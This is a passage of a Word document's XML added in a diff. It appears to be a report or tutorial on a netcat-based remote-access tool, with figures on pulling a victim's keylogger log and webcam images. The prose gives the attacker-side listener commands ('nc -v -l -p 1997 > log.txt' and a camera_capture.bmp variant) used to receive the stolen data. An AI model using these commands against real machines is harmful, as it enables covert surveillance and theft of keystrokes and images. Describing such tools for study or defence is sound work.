+                                  </wp:cNvGraphicFramePr>
+                                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                        <pic:nvPicPr>
+                                          <pic:cNvPr id="0" name="Picture 5"/>
+                                          <pic:cNvPicPr>
+                                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                          </pic:cNvPicPr>
+                                        </pic:nvPicPr>
+                                        <pic:blipFill>
+                                          <a:blip r:embed="rId11">
+                                            <a:extLst>
+                                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                              </a:ext>
+                                            </a:extLst>
+                                          </a:blip>
+                                          <a:srcRect/>
+                                          <a:stretch>
+                                            <a:fillRect/>
+                                          </a:stretch>
+                                        </pic:blipFill>
+                                        <pic:spPr bwMode="auto">
+                                          <a:xfrm>
+                                            <a:off x="0" y="0"/>
+                                            <a:ext cx="5937885" cy="3115945"/>
+                                          </a:xfrm>
+                                          <a:prstGeom prst="rect">
+                                            <a:avLst/>
+                                          </a:prstGeom>
+                                          <a:noFill/>
+                                          <a:ln>
+                                            <a:noFill/>
+                                          </a:ln>
+                                        </pic:spPr>
+                                      </pic:pic>
+                                    </a:graphicData>
+                                  </a:graphic>
+                                </wp:inline>
+                              </w:drawing>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">Figure </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>4</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">. </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>Taking the key logger’s log file</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="593A0753" id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:428.65pt;height:272.35pt;z-index:-251651072;visibility:visible;mso-wrap-style:none;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" strokecolor="white [3212]">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:noProof/>
+                        </w:rPr>
+                        <w:drawing>
+                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59B3064F" wp14:editId="2971B1EB">
+                            <wp:extent cx="5937885" cy="3115945"/>
+                            <wp:effectExtent l="0" t="0" r="5715" b="8255"/>
+                            <wp:docPr id="45" name="Picture 45"/>
+                            <wp:cNvGraphicFramePr>
+                              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                            </wp:cNvGraphicFramePr>
+                            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                  <pic:nvPicPr>
+                                    <pic:cNvPr id="0" name="Picture 5"/>
+                                    <pic:cNvPicPr>
+                                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                    </pic:cNvPicPr>
+                                  </pic:nvPicPr>
+                                  <pic:blipFill>
+                                    <a:blip r:embed="rId11">
+                                      <a:extLst>
+                                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                        </a:ext>
+                                      </a:extLst>
+                                    </a:blip>
+                                    <a:srcRect/>
+                                    <a:stretch>
+                                      <a:fillRect/>
+                                    </a:stretch>
+                                  </pic:blipFill>
+                                  <pic:spPr bwMode="auto">
+                                    <a:xfrm>
+                                      <a:off x="0" y="0"/>
+                                      <a:ext cx="5937885" cy="3115945"/>
+                                    </a:xfrm>
+                                    <a:prstGeom prst="rect">
+                                      <a:avLst/>
+                                    </a:prstGeom>
+                                    <a:noFill/>
+                                    <a:ln>
+                                      <a:noFill/>
+                                    </a:ln>
+                                  </pic:spPr>
+                                </pic:pic>
+                              </a:graphicData>
+                            </a:graphic>
+                          </wp:inline>
+                        </w:drawing>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">Figure </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>4</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">. </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>Taking the key logger’s log file</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figure 4 shows how the attacker can retrieve the text file containing the data logged by the key logger that comes along with the netcat sever. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Entering the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t>-k</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> command would relay the command </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t>nc -v -l -p 1997 &gt; log.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">to netcat. This, in turn, would initialize a listener that would wait and accept connections that are transmitting a text file. This command would also create a local </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t>log.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> file which would serve as the container of the file to be received from the remote computer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>. Conversely, if a file with the same name already exists, it is updated once the said file is received from the victim’s machine.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7C7CA4F8" wp14:editId="3BDC254A">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:posOffset>-1003</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>21222</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="5443855" cy="3458845"/>
+                <wp:effectExtent l="0" t="0" r="10160" b="27305"/>
+                <wp:wrapNone/>
+                <wp:docPr id="16" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5443855" cy="3458845"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:schemeClr val="bg1"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:noProof/>
+                              </w:rPr>
+                              <w:drawing>
+                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68703F12" wp14:editId="7BCFE19F">
+                                  <wp:extent cx="5937885" cy="3128010"/>
+                                  <wp:effectExtent l="0" t="0" r="5715" b="0"/>
+                                  <wp:docPr id="46" name="Picture 46"/>
+                                  <wp:cNvGraphicFramePr>
+                                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                                  </wp:cNvGraphicFramePr>
+                                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                        <pic:nvPicPr>
+                                          <pic:cNvPr id="0" name="Picture 6"/>
+                                          <pic:cNvPicPr>
+                                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                          </pic:cNvPicPr>
+                                        </pic:nvPicPr>
+                                        <pic:blipFill>
+                                          <a:blip r:embed="rId12">
+                                            <a:extLst>
+                                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                              </a:ext>
+                                            </a:extLst>
+                                          </a:blip>
+                                          <a:srcRect/>
+                                          <a:stretch>
+                                            <a:fillRect/>
+                                          </a:stretch>
+                                        </pic:blipFill>
+                                        <pic:spPr bwMode="auto">
+                                          <a:xfrm>
+                                            <a:off x="0" y="0"/>
+                                            <a:ext cx="5937885" cy="3128010"/>
+                                          </a:xfrm>
+                                          <a:prstGeom prst="rect">
+                                            <a:avLst/>
+                                          </a:prstGeom>
+                                          <a:noFill/>
+                                          <a:ln>
+                                            <a:noFill/>
+                                          </a:ln>
+                                        </pic:spPr>
+                                      </pic:pic>
+                                    </a:graphicData>
+                                  </a:graphic>
+                                </wp:inline>
+                              </w:drawing>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">Figure </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>5</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">. </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>Taking images using the victim’s built-in camera</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="7C7CA4F8" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-.1pt;margin-top:1.65pt;width:428.65pt;height:272.35pt;z-index:-251649024;visibility:visible;mso-wrap-style:none;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" strokecolor="white [3212]">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:noProof/>
+                        </w:rPr>
+                        <w:drawing>
+                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68703F12" wp14:editId="7BCFE19F">
+                            <wp:extent cx="5937885" cy="3128010"/>
+                            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
+                            <wp:docPr id="46" name="Picture 46"/>
+                            <wp:cNvGraphicFramePr>
+                              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                            </wp:cNvGraphicFramePr>
+                            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                  <pic:nvPicPr>
+                                    <pic:cNvPr id="0" name="Picture 6"/>
+                                    <pic:cNvPicPr>
+                                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                    </pic:cNvPicPr>
+                                  </pic:nvPicPr>
+                                  <pic:blipFill>
+                                    <a:blip r:embed="rId12">
+                                      <a:extLst>
+                                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                        </a:ext>
+                                      </a:extLst>
+                                    </a:blip>
+                                    <a:srcRect/>
+                                    <a:stretch>
+                                      <a:fillRect/>
+                                    </a:stretch>
+                                  </pic:blipFill>
+                                  <pic:spPr bwMode="auto">
+                                    <a:xfrm>
+                                      <a:off x="0" y="0"/>
+                                      <a:ext cx="5937885" cy="3128010"/>
+                                    </a:xfrm>
+                                    <a:prstGeom prst="rect">
+                                      <a:avLst/>
+                                    </a:prstGeom>
+                                    <a:noFill/>
+                                    <a:ln>
+                                      <a:noFill/>
+                                    </a:ln>
+                                  </pic:spPr>
+                                </pic:pic>
+                              </a:graphicData>
+                            </a:graphic>
+                          </wp:inline>
+                        </w:drawing>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">Figure </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>5</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">. </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>Taking images using the victim’s built-in camera</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>F</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>igure 5 shows how the attacker can retrieve images taken with the remote machine’s built-in camera. Entering the -m command would initialize a netcat listener that accepts connections that are sending files of type bitmap (bmp). This command relays nc -v -l -p 1997 &gt; camera_capture.bmp to nectat which in turn creates a local bitmap file that would act as a container for the image file to be retrieved from the remote host.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5089EB97" wp14:editId="168EFCAB">
+                <wp:extent cx="5943600" cy="3453679"/>
+                <wp:effectExtent l="0" t="0" r="10160" b="13970"/>
+                <wp:docPr id="19" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5943600" cy="3453679"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:schemeClr val="bg1"/>
+                          </a:solidFill>
